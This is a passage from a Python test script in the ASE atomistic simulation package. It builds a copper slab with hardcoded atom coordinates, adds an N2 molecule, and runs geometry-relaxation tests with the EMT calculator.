5.733333333333333, 5.009870513769302, -2.146500000000000]), Atom('Cu', [ 7.071531840490880, 4.244150023558786, -0.202086055768352]), Atom('Cu', [ 8.433333333333335, 5.009870513769302, -2.146500000000000]), Atom('Cu', [ 9.771531840491031, 4.244150023558828, -0.202086055768371]), Atom('Cu', [ 11.133333333333335, 5.009870513769302, -2.146500000000000]), Atom('Cu', [ 3.021531840490714, 6.582418613776583, -0.202086055768197]), Atom('Cu', [ 4.383333333333334, 7.348139103987287, -2.146500000000000]), Atom('Cu', [ 5.721531840490814, 6.582418613776629, -0.202086055768203]), Atom('Cu', [ 7.083333333333333, 7.348139103987287, -2.146500000000000]), Atom('Cu', [ 8.421531840490985, 6.582418613776876, -0.202086055768357]), Atom('Cu', [ 9.783333333333335, 7.348139103987287, -2.146500000000000]), Atom('Cu', [ 11.121531840490929, 6.582418613776676, -0.202086055768221]), Atom('Cu', [ 12.483333333333334, 7.348139103987287, -2.146500000000000]), ]) mask = [a.position[2] < -1 for a in slab] slab.set_constraint(FixAtoms(mask=mask)) a = 2.70 c = 1.59 * a h = 1.85 d = 1.10 x = slab.positions[0, 2] / (c / 2) * 100 molecule = Atoms('2N', positions=[(0., 0., h), (0., 0., h + d)]) molecule.set_calculator(EMT()) slab.extend(molecule) return slab def get_calculator(): return EMT() run_test(get_atoms_surf, get_calculator, name + '-surf', steps=200) run_test(get_atoms_adsorbate, get_calculator, name + '-N2', steps=200)
grhawk/ASE
tools/ase/optimize/test/N2Cu_relax.py
Python
gpl-2.0
4,291
[ "ASE" ]
60650b9ecb43fee91f8000d43098a050b585f0e903161718761dfcba068cffa1